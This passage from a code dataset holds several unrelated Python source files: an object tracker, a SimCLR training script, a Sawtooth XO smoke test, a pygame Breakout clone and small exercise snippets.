기능\r\ncv2.destroyAllWindows()\r\n","sub_path":"ComputerVisionDrone/sources/openCV/videoIO/videoGrayLoad.py","file_name":"videoGrayLoad.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"85233541","text":"# Copyright (c) 2023 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nThis code is based on https://github.com/WWangYuHsiang/SMILEtrack/blob/main/BoT-SORT/tracker/bot_sort.py\n\"\"\"\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import deque\n\nfrom ..matching import jde_matching as matching\nfrom ..motion import GMC\nfrom .base_jde_tracker import TrackState, STrack\nfrom .base_jde_tracker import joint_stracks, sub_stracks, remove_duplicate_stracks\nfrom ..motion import KalmanFilter\n\n\nclass BOTSORTTracker(object):\n \"\"\"\n BOTSORT tracker, support single class\n\n Args:\n track_high_thresh (float): threshold of detection high score\n track_low_thresh (float): threshold of remove detection score\n new_track_thresh (float): threshold of new track score\n match_thresh (float): iou threshold for associate\n track_buffer (int): tracking reserved frames,default 30\n min_box_area (float): reserved min box\n camera_motion (bool): Whether use camera motion, default False\n cmc_method (str): camera motion method,defalut sparseOptFlow\n frame_rate (int): fps buffer_size=int(frame_rate / 30.0 * track_buffer)\n \"\"\"\n\n def __init__(self,\n track_high_thresh=0.3,\n track_low_thresh=0.2,\n new_track_thresh=0.4,\n match_thresh=0.7,\n track_buffer=30,\n min_box_area=0,\n camera_motion=False,\n cmc_method='sparseOptFlow',\n frame_rate=30):\n\n self.tracked_stracks = [] # type: list[STrack]\n self.lost_stracks = [] # type: list[STrack]\n self.removed_stracks = [] # type: list[STrack]\n\n self.frame_id = 0\n\n self.track_high_thresh = track_high_thresh\n self.track_low_thresh = track_low_thresh\n self.new_track_thresh = new_track_thresh\n self.match_thresh = match_thresh\n self.buffer_size = int(frame_rate / 30.0 * track_buffer)\n self.max_time_lost = self.buffer_size\n self.kalman_filter = KalmanFilter()\n self.min_box_area = min_box_area\n\n self.camera_motion = camera_motion\n self.gmc = GMC(method=cmc_method)\n\n def update(self, output_results, img=None):\n self.frame_id += 1\n activated_starcks = []\n refind_stracks = []\n lost_stracks = []\n removed_stracks = []\n\n if len(output_results):\n bboxes = output_results[:, 2:6]\n scores = output_results[:, 1]\n classes = output_results[:, 0]\n\n # Remove bad detections\n lowest_inds = scores > self.track_low_thresh\n bboxes = bboxes[lowest_inds]\n scores = scores[lowest_inds]\n classes = classes[lowest_inds]\n\n # Find high threshold detections\n remain_inds = scores > self.track_high_thresh\n dets = bboxes[remain_inds]\n scores_keep = scores[remain_inds]\n classes_keep = classes[remain_inds]\n\n else:\n bboxes = []\n scores = []\n classes = []\n dets = []\n scores_keep = []\n classes_keep = []\n\n if len(dets) > 0:\n '''Detections'''\n detections = [\n STrack(STrack.tlbr_to_tlwh(tlbr), s, c)\n for (tlbr, s, c) in zip(dets, scores_keep, classes_keep)\n ]\n else:\n detections = []\n ''' Add newly detected tracklets to tracked_stracks'''\n unconfirmed = []\n tracked_stracks = [] # type: list[STrack]\n for track in self.tracked_stracks:\n if not track.is_activated:\n unconfirmed.append(track)\n else:\n tracked_stracks.append(track)\n ''' Step 2: First association, with high score detection boxes'''\n strack_pool = joint_stracks(tracked_stracks, self.lost_stracks)\n\n # Predict the current location with KF\n STrack.multi_predict(strack_pool, self.kalman_filter)\n\n # Fix camera motion\n if self.camera_motion:\n warp = self.gmc.apply(img[0], dets)\n STrack.multi_gmc(strack_pool, warp)\n STrack.multi_gmc(unconfirmed, warp)\n\n # Associate with high score detection boxes\n ious_dists = matching.iou_distance(strack_pool, detections)\n matches, u_track, u_detection = matching.linear_assignment(\n ious_dists, thresh=self.match_thresh)\n\n for itracked, idet in matches:\n track = strack_pool[itracked]\n det = detections[idet]\n if track.state == TrackState.Tracked:\n track.update(detections[idet], self.frame_id)\n activated_starcks.append(track)\n else:\n track.re_activate(det, self.frame_id, new_id=False)\n refind_stracks.append(track)\n ''' Step 3: Second association, with low score detection boxes'''\n if len(scores):\n inds_high = scores < self.track_high_thresh\n inds_low = scores > self.track_low_thresh\n inds_second = np.logical_and(inds_low, inds_high)\n dets_second = bboxes[inds_second]\n scores_second = scores[inds_second]\n classes_second = classes[inds_second]\n else:\n dets_second = []\n scores_second = []\n classes_second = []\n\n # association the untrack to the low score detections\n if len(dets_second) > 0:\n '''Detections'''\n detections_second = [\n STrack(STrack.tlbr_to_tlwh(tlbr), s, c) for (tlbr, s, c) in\n zip(dets_second, scores_second, classes_second)\n ]\n else:\n detections_second = []\n\n r_tracked_stracks = [\n strack_pool[i] for i in u_track\n if strack_pool[i].state == TrackState.Tracked\n ]\n dists = matching.iou_distance(r_tracked_stracks, detections_second)\n matches, u_track, u_detection_second = matching.linear_assignment(\n dists, thresh=0.5)\n for itracked, idet in matches:\n track = r_tracked_stracks[itracked]\n det = detections_second[idet]\n if track.state == TrackState.Tracked:\n track.update(det, self.frame_id)\n activated_starcks.append(track)\n else:\n track.re_activate(det, self.frame_id, new_id=False)\n refind_stracks.append(track)\n\n for it in u_track:\n track = r_tracked_stracks[it]\n if not track.state == TrackState.Lost:\n track.mark_lost()\n lost_stracks.append(track)\n '''Deal with unconfirmed tracks, usually tracks with only one beginning frame'''\n detections = [detections[i] for i in u_detection]\n dists = matching.iou_distance(unconfirmed, detections)\n\n matches, u_unconfirmed, u_detection = matching.linear_assignment(\n dists, thresh=0.7)\n for itracked, idet in matches:\n unconfirmed[itracked].update(detections[idet], self.frame_id)\n activated_starcks.append(unconfirmed[itracked])\n for it in u_unconfirmed:\n track = unconfirmed[it]\n track.mark_removed()\n removed_stracks.append(track)\n \"\"\" Step 4: Init new stracks\"\"\"\n for inew in u_detection:\n track = detections[inew]\n if track.score < self.new_track_thresh:\n continue\n\n track.activate(self.kalman_filter, self.frame_id)\n activated_starcks.append(track)\n \"\"\" Step 5: Update state\"\"\"\n for track in self.lost_stracks:\n if self.frame_id - track.end_frame > self.max_time_lost:\n track.mark_removed()\n removed_stracks.append(track)\n \"\"\" Merge \"\"\"\n self.tracked_stracks = [\n t for t in self.tracked_stracks if t.state == TrackState.Tracked\n ]\n self.tracked_stracks = joint_stracks(self.tracked_stracks,\n activated_starcks)\n self.tracked_stracks = joint_stracks(self.tracked_stracks,\n refind_stracks)\n self.lost_stracks = sub_stracks(self.lost_stracks, self.tracked_stracks)\n self.lost_stracks.extend(lost_stracks)\n self.lost_stracks = sub_stracks(self.lost_stracks, self.removed_stracks)\n self.removed_stracks.extend(removed_stracks)\n self.tracked_stracks, self.lost_stracks = remove_duplicate_stracks(\n self.tracked_stracks, self.lost_stracks)\n\n # output_stracks = [track for track in self.tracked_stracks if track.is_activated]\n output_stracks = [track for track in self.tracked_stracks]\n\n return output_stracks\n","sub_path":"deploy/pptracking/python/mot/tracker/botsort_tracker.py","file_name":"botsort_tracker.py","file_ext":"py","file_size_in_byte":9402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"121080714","text":"import os\n\nappVersion = 106\n\ncached_dir = \".cached\"\nif not os.path.isdir(cached_dir):\n os.mkdir(cached_dir)\n\ndb_top_dir = \".db\"\nif not os.path.isdir(db_top_dir):\n os.mkdir(db_top_dir)\n\nfirst_run_dir = \".first_run\"\nif not os.path.isdir(first_run_dir):\n os.mkdir(first_run_dir)\n\nguanjia_skey_version = 2\n","sub_path":"const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"234817779","text":"import argparse\nimport os\n\nimport pandas as pd\nimport torch\nimport torch.optim as optim\nfrom thop import profile, clever_format\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom PIL import Image\nfrom torchvision import transforms\nfrom torchvision import datasets\n\nfrom model import Model\n\n\n# train for one epoch to learn unique features\ndef train(net, data_loader, train_optimizer):\n net.train()\n total_loss, total_num, train_bar = 0.0, 0, tqdm(data_loader)\n for pos_1, pos_2, target in tqdm(data_loader):\n pos_1, pos_2 = pos_1.to(device), pos_2.to(device)\n # print('pos_1 :', pos_1.shape[0])\n # print('pos_2 :', pos_2.shape)\n feature_1, out_1 = net(pos_1)\n feature_2, out_2 = net(pos_2)\n # print('out_1 :', out_1.shape)\n # print('out_2 :', out_2.shape)\n # [2*B, D]\n out = torch.cat([out_1, out_2], dim=0)\n # print('out :', out.shape)\n # [2*B, 2*B]\n sim_matrix = torch.exp(torch.mm(out, out.t().contiguous()) / temperature)\n # print(torch.ones_like(sim_matrix).shape)\n # print(torch.eye(2*batch_size).shape)\n mask = (torch.ones_like(sim_matrix) - torch.eye(2 * pos_1.shape[0], device=sim_matrix.device)).bool()\n # [2*B, 2*B-1]\n sim_matrix = sim_matrix.masked_select(mask).view(2 * pos_1.shape[0], -1)\n\n # compute loss\n pos_sim = torch.exp(torch.sum(out_1 * out_2, dim=-1) / temperature)\n # [2*B]\n pos_sim = torch.cat([pos_sim, pos_sim], dim=0)\n loss = (- torch.log(pos_sim / sim_matrix.sum(dim=-1))).mean()\n train_optimizer.zero_grad()\n loss.backward()\n train_optimizer.step()\n\n total_num += batch_size\n total_loss += loss.item() * batch_size\n train_bar.set_description('Train Epoch: [{}/{}] Loss: {:.4f}'.format(epoch, epochs, total_loss / total_num))\n\n return total_loss / total_num\n\n\n# test for one epoch, use weighted knn to find the most similar images' label to assign the test image\ndef test(net, memory_data_loader, test_data_loader):\n net.eval()\n total_top1, total_top5, total_num, feature_bank, target_vec = 0.0, 0.0, 0, [], []\n with torch.no_grad():\n # generate feature bank\n for data, _, target in tqdm(memory_data_loader, desc='Feature extracting'):\n feature, out = net(data.to(device))\n feature_bank.append(feature)\n target_vec.append(target)\n # [D, N]\n feature_bank = torch.cat(feature_bank, dim=0).t().contiguous()\n target_vec = torch.cat(target_vec, dim=0).t().contiguous()\n # [N]\n # classes = memory_data_loader.dataset.classes\n # map = {'pouring':0, 'not_pouring':1}\n feature_labels = torch.tensor(target_vec, device=feature_bank.device)\n # loop test data to predict the label by weighted knn search\n test_bar = tqdm(test_data_loader)\n for data, _, target in test_bar:\n data, target = data.to(device), target.to(device)\n feature, out = net(data)\n\n total_num += data.size(0)\n # compute cos similarity between each feature vector and feature bank ---> [B, N]\n sim_matrix = torch.mm(feature, feature_bank)\n # [B, K]\n sim_weight, sim_indices = sim_matrix.topk(k=k, dim=-1)\n # [B, K]\n sim_labels = torch.gather(feature_labels.expand(data.size(0), -1), dim=-1, index=sim_indices)\n sim_weight = (sim_weight / temperature).exp()\n\n # counts for each class\n one_hot_label = torch.zeros(data.size(0) * k, c, device=sim_labels.device)\n # [B*K, C]\n one_hot_label = one_hot_label.scatter(dim=-1, index=sim_labels.view(-1, 1), value=1.0)\n # weighted score ---> [B, C]\n pred_scores = torch.sum(one_hot_label.view(data.size(0), -1, c) * sim_weight.unsqueeze(dim=-1), dim=1)\n\n pred_labels = pred_scores.argsort(dim=-1, descending=True)\n total_top1 += torch.sum((pred_labels[:, :1] == target.unsqueeze(dim=-1)).any(dim=-1).float()).item()\n total_top5 += torch.sum((pred_labels[:, :5] == target.unsqueeze(dim=-1)).any(dim=-1).float()).item()\n test_bar.set_description('Test Epoch: [{}/{}] Acc@1:{:.2f}% Acc@5:{:.2f}%'\n .format(epoch, epochs, total_top1 / total_num * 100, total_top5 / total_num * 100))\n\n return total_top1 / total_num * 100, total_top5 / total_num * 100\n\n\nclass SimCLR_Dataset(torch.utils.data.Dataset):\n # print('Inside wrapper')\n '''Dataset Wrapper for SimCLR'''\n\n def __init__(self, data, transform, root, train=True):\n self.data = data\n self.transform = transform\n self.train = train\n self.root = root\n self.classes = self._get_classes(self.root)\n\n def __getitem__(self, index):\n img, target = self.data[index]\n\n pos_1 = self.transform(img)\n pos_2 = self.transform(img)\n\n return pos_1, pos_2, target\n\n def __len__(self):\n return len(self.data)\n\n def _get_classes(self, dir):\n classes = [d.name for d in os.scandir(dir)]\n return classes\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Train SimCLR')\n parser.add_argument('--dir_path', default='/sandbox_classification_data', type=str, help='Data directory')\n parser.add_argument('--feature_dim', default=128, type=int, help='Feature dim for latent vector')\n parser.add_argument('--temperature', default=0.5, type=float, help='Temperature used in softmax')\n parser.add_argument('--k', default=200, type=int, help='Top k most similar images used to predict the label')\n parser.add_argument('--batch_size', default=512, type=int, help='Number of images in each mini-batch')\n parser.add_argument('--epochs', default=100, type=int, help='Number of sweeps over the dataset to train')\n parser.add_argument('--resume', '-r', type=str, default='', help='Checkpoint path for resume / test.')\n\n # args parser\n args = parser.parse_args()\n #dir = args.dir_path\n feature_dim, temperature, k = args.feature_dim, args.temperature, args.k\n batch_size, epochs = args.batch_size, args.epochs\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(device)\n\n # data prepare\n\n train_transform = transforms.Compose([\n transforms.RandomResizedCrop(32),\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomApply([transforms.ColorJitter(0.4, 0.4, 0.4, 0.1)], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n transforms.ToTensor(),\n transforms.Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])])\n test_transform = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])])\n\n data_dir = args.dir_path\n traindir = os.path.join(data_dir, 'train/')\n valdir = os.path.join('/media/neo/krypton/data/data_ptc/pouring_classification_data/ptc_dataset/', 'val/')\n\n train_dataset = datasets.ImageFolder(traindir)\n train_dataset = SimCLR_Dataset(train_dataset, transform=train_transform, root=traindir, train=True)\n train_loader = DataLoader(\n train_dataset,\n batch_size=batch_size,\n num_workers=16,\n pin_memory=True\n )\n mem_dataset = datasets.ImageFolder(traindir)\n mem_dataset = SimCLR_Dataset(mem_dataset, transform=test_transform, root=traindir, train=False)\n memory_loader = DataLoader(\n mem_dataset,\n batch_size=int(batch_size*0.5),\n num_workers=16,\n shuffle = False,\n pin_memory=True\n )\n test_dataset = datasets.ImageFolder(valdir)\n test_dataset = SimCLR_Dataset(test_dataset,\n transform=test_transform,\n root=valdir,\n train=False)\n test_loader = DataLoader(\n test_dataset,\n batch_size=int(batch_size*0.5),\n num_workers=16,\n shuffle = False,\n pin_memory=True\n )\n\n # # memory_data = utils.CIFAR10Pair(root='data', train=True, transform=utils.test_transform, download=True)\n # memory_loader = DataLoader(memory_data, batch_size=batch_size, shuffle=False, num_workers=16, pin_memory=True)\n # test_data = utils.DataPair(root=data_dir, train =False, transfrom=utils.test_transform)\n # # test_data = utils.CIFAR10Pair(root='data', train=False, transform=utils.test_transform, download=True)\n # # test_loader = DataLoader(test_data, batch_size=batch_size, shuffle=False, num_workers=16, pin_memory=True)\n\n # model setup and optimizer config\n model = Model(feature_dim).to(device)\n flops, params = profile(model, inputs=(torch.randn(1, 3, 32, 32).to(device),))\n flops, params = clever_format([flops, params])\n print('# Model Params: {} FLOPs: {}'.format(params, flops))\n optimizer = optim.Adam(model.parameters(), lr=1e-3, weight_decay=1e-6)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=len(train_loader), eta_min=0, last_epoch=-1)\n c = len(mem_dataset.classes)\n\n # training loop\n results = {'train_loss': [], 'test_acc@1': [], 'test_acc@5': []}\n save_name_pre = '{}_{}_{}_{}_{}'.format(feature_dim, temperature, k, batch_size, epochs)\n if not os.path.exists('results'):\n os.mkdir('results')\n best_acc = 0.0\n start_epoch = 1\n if args.resume:\n if os.path.isfile(args.resume):\n checkpoint = torch.load(args.resume)\n start_epoch = checkpoint['epoch'] + 1\n best_acc = checkpoint['best_acc']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n print('Model restored from epoch:', start_epoch)\n for epoch in range(start_epoch, epochs + 1):\n train_loss = train(model, train_loader, optimizer)\n scheduler.step()\n results['train_loss'].append(train_loss)\n test_acc_1, test_acc_5 = test(model, memory_loader, test_loader)\n results['test_acc@1'].append(test_acc_1)\n results['test_acc@5'].append(test_acc_5)\n if test_acc_1 > best_acc:\n best_acc = test_acc_1\n # save statistics\n data_frame = pd.DataFrame(data=results, index=range(1, epoch + 1))\n data_frame.to_csv('results/iter_1/{}_statistics.csv'.format(save_name_pre), index_label='epoch')\n checkpoint = {\n 'epoch': epoch,\n 'state_dict': model.state_dict(),\n 'best_acc': best_acc,\n 'optimizer': optimizer.state_dict(),\n }\n model.save(checkpoint, 'results/iter_1/{}_epoch_{}_checkpoint.pth'.format(save_name_pre,epoch))\n if test_acc_1 > best_acc:\n best_acc = test_acc_1\n torch.save(model.state_dict(), 'results/iter_1/{}_model.pth'.format(save_name_pre))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"178612758","text":"from string import ascii_lowercase as lc\nnb_test = int(input())\nfor _ in range(nb_test):\n nb_chr, time_repeat = [int(x) for x in input().split()]\n alpha = lc[:nb_chr]\n exclude= input()\n ans = \"\"\n for i in alpha:\n if i not in exclude:\n ans += i\n print(ans * time_repeat)\n\n","sub_path":"codechef/BUGF18C.py","file_name":"BUGF18C.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"288839661","text":"# Copyright 2017 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ------------------------------------------------------------------------------\n\nimport os\nimport shlex\nimport logging\nimport unittest\nimport subprocess\n\nfrom sawtooth_integration.tests.integration_tools import XoClient\nfrom sawtooth_integration.tests.integration_tools import wait_for_rest_apis\n\n\nLOGGER = logging.getLogger(__name__)\nLOGGER.setLevel(logging.DEBUG)\n\n\nWAIT = 300\nREST_API = 'rest-api:8008'\n\n\nclass TestXoSmoke(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.client = XoClient('http://' + REST_API)\n wait_for_rest_apis([REST_API])\n\n def test_xo_smoke(self):\n for username in ('nunzio', 'tony'):\n _send_cmd('sawtooth keygen {}'.format(username))\n\n game_cmds = (\n 'xo create game-1 --username nunzio',\n 'xo take game-1 1 --username nunzio',\n 'xo take game-1 4 --username tony',\n 'xo take game-1 2 --username nunzio',\n 'xo take game-1 2 --username tony',\n 'xo take game-1 5 --username tony',\n 'xo create game-2 --username tony',\n 'xo take game-2 9 --username nunzio',\n 'xo take game-2 8 --username tony',\n 'xo take game-1 3 --username tony',\n 'xo take game-1 3 --username nunzio',\n 'xo take game-1 7 --username tony',\n 'xo take game-2 6 --username nunzio',\n 'xo create blank --username tony',\n )\n\n for cmd in game_cmds:\n _send_cmd(\n '{} --url {} --wait {}'.format(\n cmd,\n self.client.url,\n WAIT))\n\n self.assert_number_of_games(3)\n\n self.verify_game('game-1', 'XXXOO----', 'P1-WIN')\n self.verify_game('game-2', '-----X-OX', 'P2-NEXT')\n self.verify_game('blank', '---------', 'P1-NEXT')\n\n LOGGER.info(\n \"Verifying that XO CLI commands don't blow up (but nothing else)\")\n\n cli_cmds = (\n 'xo list',\n 'xo show game-1',\n 'xo show game-2',\n 'xo show blank',\n )\n\n for cmd in cli_cmds:\n _send_cmd(\n '{} --url {}'.format(\n cmd,\n self.client.url))\n\n if not _tp_supports_delete():\n LOGGER.warning('TP does not support state delete')\n return\n\n delete_cmds = (\n 'xo delete game-1 --username nunzio',\n 'xo delete blank --username tony',\n )\n\n for cmd in delete_cmds:\n _send_cmd(\n '{} --url {} --wait {}'.format(\n cmd,\n self.client.url,\n WAIT))\n\n _send_cmd('xo list --url {}'.format(self.client.url))\n\n self.assert_number_of_games(1)\n\n self.verify_game('game-2', '-----X-OX', 'P2-NEXT')\n\n self.assert_no_game('game-1')\n self.assert_no_game('blank')\n\n def verify_game(self, game_name, expected_board, expected_turn):\n LOGGER.info('Verifying game: %s', game_name)\n\n board, turn, _, _ = self.client.get_game(game_name)\n\n self.assertEqual(\n board,\n expected_board,\n 'Wrong board -- expected: {} -- actual: {}'.format(\n expected_board, board))\n\n self.assertEqual(\n turn,\n expected_turn,\n 'Wrong turn -- expected: {} -- actual: {}'.format(\n expected_turn, turn))\n\n def assert_number_of_games(self, number):\n self.assertEqual(\n len(self.client.get_data()),\n number)\n\n def assert_no_game(self, game_name):\n with self.assertRaises(Exception):\n self.client.get_game(game_name)\n\n\ndef _send_cmd(cmd_str):\n LOGGER.info('Sending %s', cmd_str)\n\n subprocess.run(\n shlex.split(cmd_str),\n check=True)\n\n\ndef _tp_supports_delete():\n supported_langs = ['python', 'go']\n\n lang = os.getenv('TP_LANG', None)\n if lang is not None:\n return lang in supported_langs\n\n return False\n","sub_path":"tests/sawtooth_integration/tests/test_xo_smoke.py","file_name":"test_xo_smoke.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"238859907","text":"\"\"\"\nOriginal code source:\n bricka (a breakout clone)\n\n\n Developed by Leonel Machava \n http://codeNtronix.com\n\"\"\"\nimport sys\nimport pygame\nfrom homework.HW_3.__main__.Constants import Constants as Consts\nfrom homework.HW_3.__main__.Levels import Levels\n\nCONSTANTS = Consts()\n\n\nclass Bricka:\n\n def __init__(self):\n pygame.init()\n \n self.screen = pygame.display.set_mode(CONSTANTS.SCREEN_SIZE)\n pygame.display.set_caption(\"bricka (a breakout clone by codeNtronix.com)\")\n \n self.clock = pygame.time.Clock()\n\n if pygame.font:\n self.font = pygame.font.Font(None,30)\n else:\n self.font = None\n\n self.init_game()\n\n \n def init_game(self):\n self.lives = 3\n self.score = 0\n self.state = CONSTANTS.STATE_BALL_IN_PADDLE\n\n self.ball_vel = CONSTANTS.BALL_VELOCITY\n self.levels = Levels()\n\n self.init_next_level()\n\n def init_next_level(self):\n self.lives = 3\n keep_going = self.levels.Load_Next_Level()\n if keep_going:\n self.bricks = self.levels.getBricks()\n self.paddle = pygame.Rect(300, CONSTANTS.PADDLE_Y, CONSTANTS.PADDLE_WIDTH, CONSTANTS.PADDLE_HEIGHT)\n self.ball = pygame.Rect(300, CONSTANTS.PADDLE_Y - CONSTANTS.BALL_DIAMETER, CONSTANTS.BALL_DIAMETER,\n CONSTANTS.BALL_DIAMETER)\n else:\n self.state = CONSTANTS.STATE_WON\n\n def draw_bricks(self):\n for brick in self.bricks:\n pygame.draw.rect(self.screen, brick.color, brick.rect)\n \n def check_input(self):\n\n self.checkForQuit()\n keys = pygame.key.get_pressed()\n \n if keys[pygame.K_LEFT]:\n self.paddle.left -= CONSTANTS.PADDLE_MOVE_INCREMENT\n if self.paddle.left < 0:\n self.paddle.left = 0\n\n if keys[pygame.K_RIGHT]:\n self.paddle.left += CONSTANTS.PADDLE_MOVE_INCREMENT\n if self.paddle.left > CONSTANTS.MAX_PADDLE_X:\n self.paddle.left = CONSTANTS.MAX_PADDLE_X\n\n if keys[pygame.K_SPACE] and self.state == CONSTANTS.STATE_BALL_IN_PADDLE:\n self.ball_vel = CONSTANTS.BALL_VELOCITY\n self.state = CONSTANTS.STATE_PLAYING\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n if(self.state == CONSTANTS.STATE_GAME_OVER or self.state == CONSTANTS.STATE_WON):\n self.init_game()\n elif(self.state == CONSTANTS.STATE_GET_NEXT_LEVEL):\n self.state = CONSTANTS.STATE_START_NEXT_LEVEL\n\n def move_ball(self):\n self.ball.left += self.ball_vel[0]\n self.ball.top += self.ball_vel[1]\n\n if self.ball.left <= 0:\n self.ball.left = 0\n self.ball_vel[0] = -self.ball_vel[0]\n elif self.ball.left >= CONSTANTS.MAX_BALL_X:\n self.ball.left = CONSTANTS.MAX_BALL_X\n self.ball_vel[0] = -self.ball_vel[0]\n \n if self.ball.top < 0:\n self.ball.top = 0\n self.ball_vel[1] = -self.ball_vel[1]\n elif self.ball.top >= CONSTANTS.MAX_BALL_Y:\n self.ball.top = CONSTANTS.MAX_BALL_Y\n self.ball_vel[1] = -self.ball_vel[1]\n\n def handle_collisions(self):\n for brick in self.bricks:\n if self.ball.colliderect(brick.rect):\n if brick.hits_to_break > 0:\n self.score += 3\n if (self.ball.right - self.ball_vel[0] <= brick.rect.left or self.ball.left - self.ball_vel[0] >= brick.rect.right) and (not (self.ball.bottom - 2 < brick.rect.top or self.ball.top + 2 > brick.rect.bottom)):\n self.ball_vel[0] = -self.ball_vel[0]\n else:\n self.ball_vel[1] = -self.ball_vel[1]\n\n brick.onHit()\n if brick.hits_to_break == 0:\n self.bricks.remove(brick)\n break\n\n temp_state = self.state\n self.state = CONSTANTS.STATE_GET_NEXT_LEVEL\n for brick in self.bricks:\n if brick.hits_to_break > 0:\n self.state = temp_state\n else:\n continue\n\n \n if self.ball.colliderect(self.paddle):\n self.ball.top = CONSTANTS.PADDLE_Y - CONSTANTS.BALL_DIAMETER\n self.ball_vel[1] = -self.ball_vel[1]\n if (self.ball.left + CONSTANTS.BALL_RADIUS < self.paddle.left + (CONSTANTS.PADDLE_WIDTH // 2)):\n self.ball_vel[0] = -abs(self.ball_vel[0])\n else:\n self.ball_vel[0] = abs(self.ball_vel[0])\n\n elif self.ball.top > self.paddle.top:\n self.lives -= 1\n if self.lives > 0:\n self.state = CONSTANTS.STATE_BALL_IN_PADDLE\n else:\n self.state = CONSTANTS.STATE_GAME_OVER\n\n def show_stats(self):\n if self.font:\n font_surface = self.font.render(\"SCORE: \" + str(self.score) + \" LIVES: \" + str(self.lives), False, CONSTANTS.WHITE)\n self.screen.blit(font_surface, (205,5))\n\n def show_message(self,message):\n if self.font:\n size = self.font.size(message)\n font_surface = self.font.render(message,False, CONSTANTS.WHITE)\n x = (CONSTANTS.SCREEN_SIZE[0] - size[0]) / 2\n y = (CONSTANTS.SCREEN_SIZE[1] - size[1]) / 2\n self.screen.blit(font_surface, (x,y))\n\n def terminate(self):\n print(\"terminating\")\n pygame.quit()\n sys.exit()\n\n def checkForQuit(self):\n for event in pygame.event.get(pygame.QUIT): # get all the QUIT events\n self.terminate() # terminate if any QUIT events are present\n for event in pygame.event.get(pygame.KEYUP): # get all the KEYUP events\n if event.key == pygame.K_ESCAPE:\n self.terminate() # terminate if the KEYUP event was for the Esc key\n pygame.event.post(event) # put the other KEYUP event objects back\n \n \n def run(self):\n while 1:\n\n self.clock.tick(50)\n self.screen.fill(CONSTANTS.BLACK)\n self.check_input()\n\n self.checkForQuit()\n\n if self.state == CONSTANTS.STATE_PLAYING:\n self.move_ball()\n self.handle_collisions()\n elif self.state == CONSTANTS.STATE_BALL_IN_PADDLE:\n self.ball.left = self.paddle.left + self.paddle.width / 2\n self.ball.top = self.paddle.top - self.ball.height\n self.show_message(\"PRESS SPACE TO LAUNCH THE BALL\")\n elif self.state == CONSTANTS.STATE_GAME_OVER:\n self.show_message(\"GAME OVER. PRESS ENTER TO PLAY AGAIN\")\n elif self.state == CONSTANTS.STATE_WON:\n self.show_message(\"YOU WON! PRESS ENTER TO PLAY AGAIN\")\n elif self.state == CONSTANTS.STATE_GET_NEXT_LEVEL:\n self.show_message(\"LEVEL COMPLETE! PRESS ENTER TO CONTINUE!\")\n elif self.state == CONSTANTS.STATE_START_NEXT_LEVEL:\n self.init_next_level()\n\n self.draw_bricks()\n\n # Draw paddle\n pygame.draw.rect(self.screen, CONSTANTS.BLUE, self.paddle)\n\n\n # Draw ball\n pygame.draw.circle(self.screen, CONSTANTS.WHITE, (self.ball.left + CONSTANTS.BALL_RADIUS, self.ball.top + CONSTANTS.BALL_RADIUS), CONSTANTS.BALL_RADIUS)\n\n self.show_stats()\n\n pygame.display.flip()\n\nif __name__ == \"__main__\":\n Bricka().run()\n","sub_path":"homework/HW_3/bricka.py","file_name":"bricka.py","file_ext":"py","file_size_in_byte":7658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"414473686","text":"#\n\n# Define a List with a few negative and positive numbers.\n# Using list comprehensions, obtain the square values for only the positive numbers from the original list\n\nmy_list = [1, -2, 3, -4, 6]\nnew_list = (x ** 2 for x in my_list if x > 0)\n\n# print(new_list)\n\n# (0, 1), (2, 3) … (N-1, N)\n#\n# E.g.\n# N=5\n# (0, 1), (2, 3), (4, 5)\n# N=4\n# (0, 1), (2, 3)\n\n# next - >\n\n\ndef my_generato(N):\n i, j = 0, 1\n while j <= N:\n yield (i, j)\n i += 2\n j += 2\n\n\n# for val in my_generato(5):\n# print(val)\n\n\n# Interviewer\n# - work_start : datetime\n# - work_end : datetime\n# - booked_events: Event[]\n#\n#\n# Event:\n# - start: datetime\n# - duration: int # seconds\n\nfrom datetime import 